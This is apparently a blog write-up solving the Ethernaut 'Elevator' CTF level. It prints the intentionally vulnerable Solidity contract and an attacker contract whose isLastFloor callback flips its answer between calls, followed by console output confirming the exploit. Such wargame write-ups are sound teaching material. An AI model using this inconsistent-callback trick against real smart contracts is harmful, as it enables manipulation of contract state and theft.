Ethernaut - 11. Elevator
29 Aug 2022ethernaut solidity Difficulty: πππππ
This elevator wonβt let you reach the top of your building. Right?
Things that might help:
- Sometimes solidity is not good at keeping promises.
- This Elevator expects to be used from a Building.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
interface Building {
function isLastFloor(uint) external returns (bool);
}
contract Elevator {
bool public top;
uint public floor;
function goTo(uint _floor) public {
Building building = Building(msg.sender);
if (! building.isLastFloor(_floor)) {
floor = _floor;
top = building.isLastFloor(floor);
}
}
}
Writeup
- Get new instance.
- Call methods
await contract.top() // false await contract.floor().then(v=>v.toString()) // 0 - Create a contract which implement
isLastFloor.// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import './11_Elevator.sol'; // level instance contract contract ElevatorAttack { bool result = true; function isLastFloor(uint) external returns (bool) { result = !result; return(result); // first time return false, second time return true } function gogo(address _addr,uint _floor) public { Elevator elevator = Elevator(_addr); elevator.goTo(_floor); } } - Call
gogomethod
- Call methods
await contract.top() // true await contract.floor().then(v=>v.toString()) // 10 - Submit instance ΞΎ( βΏοΌβ‘β)